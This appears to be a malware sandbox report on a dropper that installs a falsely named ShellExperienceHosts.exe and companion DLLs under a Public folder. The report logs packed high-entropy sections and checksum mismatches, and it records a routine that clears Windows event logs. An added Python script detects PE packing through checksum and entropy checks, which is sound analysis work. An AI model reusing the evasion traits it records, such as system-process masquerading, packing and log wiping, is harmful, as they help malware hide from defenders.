Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: wps_lid.lid-s8HDMqE8a6Xy.exe.lnk.3.dr | LNK file: ..\..\Public\Bulete\wps_lid.lid-s8HDMqE8a6Xy.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: S1Rv3ioghk.exe | Static file information: File size 4477216 > 1048576
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2548437777.0000000006F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbp source: powershell.exe, 00000011.00000002.2554932130.00000000080E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2548323378.0000000006F26000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\buildslave\unity\build\artifacts\WindowsPlayer\Win32_VS2019_nondev_i_r\WindowsPlayer_Master_il2cpp_x86.pdb source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B40000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, ShellExperienceHosts.exe, 00000003.00000000.1706516163.000000000040C000.00000002.00000001.01000000.00000005.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2548437777.0000000006F6F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2528351985.00000000028CF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ?COMCTL32.dllWINHTTP.dllcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -FS -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMLoad file into cachecrypto\x509\by_file.cunspecified certificate verification errorunable to get issuer certificateunable to get certificate CRLunable to decrypt certificate's signatureunable to decrypt CRL's signatureunable to decode issuer public keycertificate signature failureCRL signature failurecertificate is not yet validcertificate has expiredCRL is not yet validCRL has expiredformat error in certificate's notBefore fieldformat error in certificate's notAfter fieldformat error in CRL's lastUpdate fieldformat error in CRL's nextUpdate fieldout of memoryself signed certificateself signed certificate in certificate chainunable to get local issuer certificateunable to verify the first certificatecertificate chain too longcertificate revokedinvalid CA certificatepath length constraint exceededunsupported certificate purposecertificate not trustedcertificate rejectedsubject issuer mismatchauthority and subject key identifier mismatchauthority and issuer serial number mismatchkey usage does not include certificate signingunable to get CRL issuer certificateunhandled critical extensionkey usage does not include CRL signingunhandled critical CRL extensioninvalid non-CA certificate (has CA markings)proxy path length constraint exceededkey usage does not include digital signatureproxy certificates not allowed, please set the appropriate flaginvalid or inconsistent certificate extensioninvalid or inconsistent certificate policy extensionno explicit policyDifferent CRL scopeUnsupported extension featureRFC 3779 resource not subset of parent's resourcespermitted subtree violationexcluded subtree violationname constraints minimum and maximum not supportedapplication verification failureunsupported name constraint typeunsupported or invalid name constraint syntaxunsupported or invalid name syntaxCRL path validation errorPath LoopSuite B: certificate version invalidSuite B: invalid public key algorithmSuite B: invalid ECC curveSuite B: invalid signature algorithmSuite B: curve not allowed for this LOSSuite B: cannot sign P-384 with P-256Hostname mismatchEmail address mismatchIP address mismatchNo matching DANE TLSA recordsEE certificate key too weakCA certificate key too weakCA signature digest algorithm too weakInvalid certificate verification contextIssuer certificate lookup errorCertificate Transparency required, but no valid SCTs foundproxy subject name violationOCSP verification neededOCSP verification failedOCSP unknown certCertificate public key has explicit ECC parametersunknown certificate verification errorcrypto\asn1\x_info.ccrypto\pem\pem_info.cRSA P
Source: Binary string: H:\func_v12_i18n_202411_branch\Build\Release\WPSOffice\office6\addons\konlinesetup_xa\konlinesetup_xa.pdb source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -FS -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr

Data Obfuscation

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Unpacked PE file: 3.2.ShellExperienceHosts.exe.3320000.6.unpack
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_03327490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,3_2_03327490
Source: initial sample | Static PE information: section where entry point is pointing to: .tp6d
Source: S1Rv3ioghk.exe | Static PE information: real checksum: 0x69041 should be: 0x44b1e8
Source: yyzyBase.dll.0.dr | Static PE information: real checksum: 0x3b14ca should be: 0x3bb6cb
Source: backup.dll.3.dr | Static PE information: real checksum: 0x3b14ca should be: 0x3bb6cb
Source: ShellExperienceHosts.exe.0.dr | Static PE information: section name: .tp6
Source: ShellExperienceHosts.exe.0.dr | Static PE information: section name: .tp6a
Source: ShellExperienceHosts.exe.0.dr | Static PE information: section name: .tp6
Source: ShellExperienceHosts.exe.0.dr | Static PE information: section name: .tp6
Source: ShellExperienceHosts.exe.0.dr | Static PE information: section name: .tp6d
Source: yyzyBase.dll.0.dr | Static PE information: section name: .00cfg
Source: backup.dll.3.dr | Static PE information: section name: .00cfg
Source: backup.exe.3.dr | Static PE information: section name: .tp6
Source: backup.exe.3.dr | Static PE information: section name: .tp6a
Source: backup.exe.3.dr | Static PE information: section name: .tp6
Source: backup.exe.3.dr | Static PE information: section name: .tp6
Source: backup.exe.3.dr | Static PE information: section name: .tp6d
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Code function: 0_2_00B5C7F2 push ebx; ret 0_2_00B5C7F3
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_03334345 push ecx; ret 3_2_03334358
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_0334A168 push eax; ret 3_2_0334A119
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_0334A0B8 push eax; ret 3_2_0334A119
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_03342470 push ebp; retf 3_2_03342474
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_03342471 push ebp; retf 3_2_03342474
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_03342450 push ebp; retf 3_2_03342474
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C7A12AA push ecx; ret 3_2_6C7A12BD
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_10009DF5 push ecx; ret 3_2_10009E08
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_1001FE9A push ecx; ret 3_2_1001FEBF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_0223CAFF push eax; retf 3_2_0223CB00
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_0223CB07 pushad ; retf 3_2_0223CB08
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_0223CB0B push 701000CBh; retf 3_2_0223CB10
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_0223CB61 pushfd ; retf 3_2_0223CB64
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_02239DCC push ecx; ret 3_2_02239DDF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_031B3D04 push ecx; ret 3_2_031B3D17
Source: ShellExperienceHosts.exe.0.dr | Static PE information: section name: .tp6 entropy: 7.9916235972250025
Source: ShellExperienceHosts.exe.0.dr | Static PE information: section name: .tp6d entropy: 7.90195668192099
Source: backup.exe.3.dr | Static PE information: section name: .tp6 entropy: 7.9916235972250025
Source: backup.exe.3.dr | Static PE information: section name: .tp6d entropy: 7.90195668192099
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | File created: C:\Users\user\AppData\Local\Temp\backup.exe
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | File created: C:\Users\Public\Bulete\program\yyzyBase.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | File created: C:\Users\user\AppData\Local\Temp\backup.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | File created: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | File created: C:\Users\Public\Bulete\wps_lid.lid-s8HDMqE8a6Xy.exe
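The checksum, section-name and entropy rows above are the output of Joe Sandbox's static PE pass. The following Python is an added example, not part of the report and not code from the sample or from Joe Sandbox, that reproduces those checks with only the standard library: it parses the PE headers, recomputes the optional-header CheckSum the way the Windows loader does, measures per-section Shannon entropy, and flags an entry point outside .text or a section that is both writable and executable. The two-section file it analyzes is constructed inline for the demonstration (a NOP-filled .text and a uniform-byte .tp6d that carries the entry point, mirroring the layout the report gives for ShellExperienceHosts.exe); the STANDARD_SECTIONS list and the 7.0 entropy threshold are assumed heuristics, not something the report defines.

```python
import math
import struct
from collections import Counter

# Assumed heuristic: section names the usual Windows toolchains emit. Anything else
# (.tp6, .tp6a, .tp6d, .00cfg in the report above) deserves a closer look.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".bss", ".tls", ".CRT", ".gfids"}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(buf):
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes. Packed or
    encrypted sections sit near 8; plain x86 code is usually around 6."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def pe_checksum(data, checksum_offset):
    """Loader-style image checksum: fold the file as 32-bit words with end-around
    carry, skipping the CheckSum field itself, fold to 16 bits, add the file length."""
    padded = data + bytes((-len(data)) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:          # header fields are 4-byte aligned
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def analyze_pe(data):
    """Parse a PE32/PE32+ header and return the checks the sandbox reports."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    checksum_off = opt + 64                 # same offset in PE32 and PE32+
    header_checksum = struct.unpack_from("<I", data, checksum_off)[0]
    computed = pe_checksum(data, checksum_off)
    sections, entry_section, findings = [], None, []
    for i in range(nsections):
        hdr = opt + opt_size + 40 * i
        raw_name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, hdr)
        chars = struct.unpack_from("<I", data, hdr + 36)[0]
        name = raw_name.rstrip(b"\0").decode("ascii", "replace")
        entropy = shannon_entropy(data[rawptr:rawptr + rawsize])
        sections.append({"name": name, "entropy": entropy, "characteristics": chars})
        if va <= entry_rva < va + max(vsize, rawsize):
            entry_section = name
        if name not in STANDARD_SECTIONS:
            findings.append(f"section name: {name} (non-standard)")
        if entropy > 7.0:
            findings.append(f"section name: {name} entropy: {entropy:.2f} (packed or encrypted)")
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {name} is writable and executable")
    if entry_section is not None and entry_section != ".text":
        findings.append(f"section where entry point is pointing to: {entry_section}")
    # A zero CheckSum is normal for unsigned user-mode binaries, so only a populated
    # field that disagrees with the recomputed value is reported as a mismatch.
    if header_checksum and header_checksum != computed:
        findings.append(f"real checksum: {header_checksum:#x} should be: {computed:#x}")
    return {"header_checksum": header_checksum, "computed_checksum": computed,
            "checksum_ok": header_checksum == computed,
            "entry_section": entry_section, "sections": sections, "findings": findings}


def build_sample_pe(checksum=0):
    """Constructed two-section PE32 for the demonstration, NOT the sample from the
    report: .text is a NOP sled (entropy 0); .tp6d holds uniform bytes (entropy 8),
    is writable+executable and carries the entry point, like a packer stub."""
    dos = b"MZ" + bytes(58) + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                # PE32 magic
    struct.pack_into("<I", opt, 16, 0x2000)              # AddressOfEntryPoint -> .tp6d
    struct.pack_into("<I", opt, 28, 0x400000)            # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)      # Section / File alignment
    struct.pack_into("<II", opt, 56, 0x3000, 0x200)      # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 64, checksum)            # CheckSum
    struct.pack_into("<H", opt, 68, 2)                   # Subsystem: Windows GUI
    struct.pack_into("<I", opt, 92, 16)                  # NumberOfRvaAndSizes
    sec = "<8sIIIIIIHHI"
    text = struct.pack(sec, b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    stub = struct.pack(sec, b".tp6d", 0x200, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0xE0000020)
    headers = dos + coff + bytes(opt) + text + stub
    headers += bytes(0x200 - len(headers))
    return headers + b"\x90" * 0x200 + bytes(range(256)) * 2


if __name__ == "__main__":
    for line in analyze_pe(build_sample_pe())["findings"]:
        print(line)
```

Run it against a real dropped file with analyze_pe(open(path, "rb").read()). Read together, the report's own rows make the stronger case for packing than the checksum does: three sections all named .tp6 in one image, entropies above 7.9, and the entry point in .tp6d. backup.exe.3.dr lists the same section names and entropies as ShellExperienceHosts.exe.0.dr, and backup.dll.3.dr the same checksum pair as yyzyBase.dll.0.dr, which is consistent with the File created rows above, where ShellExperienceHosts.exe writes both backup files into %TEMP%.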

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (recorded 8 times in the original report; opening the module manifest shows PowerShell discovering or importing the BitLocker module, and these rows alone do not show a BitLocker cmdlet being invoked)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (recorded 6 times in the original report)
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C74CCDF IsWindowVisible,IsWindowVisible,GetWindowRect,IsIconic,CopyRect,MonitorFromPoint,GetMonitorInfoW,CopyRect,CopyRect,SystemParametersInfoW,OffsetRect,GetSystemMetrics,GetSystemMetrics,3_2_6C74CCDF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C6F2E3D SetForegroundWindow,IsIconic,PostMessageW,IsIconic,3_2_6C6F2E3D
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C720ABE SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageW,UpdateWindow,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,3_2_6C720ABE
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C6F0BFE IsIconic,3_2_6C6F0BFE
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C74B422 GetFocus,IsChild,SendMessageW,IsChild,SendMessageW,IsIconic,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,IsWindowVisible,3_2_6C74B422
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C743428 IsWindowVisible,IsIconic,3_2_6C743428
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C74D4B8 IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,3_2_6C74D4B8
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C74D5D3 IsWindowVisible,ScreenToClient,IsIconic,GetSystemMetrics,PtInRect,PtInRect,GetSystemMetrics,PtInRect,3_2_6C74D5D3
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C74B6ED IsWindowVisible,GetWindowRect,PtInRect,GetAsyncKeyState,ScreenToClient,IsWindow,GetWindowRect,PtInRect,SendMessageW,PtInRect,SendMessageW,ScreenToClient,PtInRect,GetParent,SendMessageW,GetFocus,WindowFromPoint,SendMessageW,GetSystemMenu,IsMenu,EnableMenuItem,EnableMenuItem,IsZoomed,IsIconic,EnableMenuItem,TrackPopupMenu,3_2_6C74B6ED
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C6DF7F4 IsIconic,GetClientRect,3_2_6C6DF7F4
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C74D7DC IsIconic,PostMessageW,3_2_6C74D7DC
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_0332B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,3_2_0332B3C0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Key value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
(The same Process information set: NOOPENFILEERRORBOX entry for powershell.exe is recorded 142 further times in the original report, once per call; the repeats are omitted here.)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
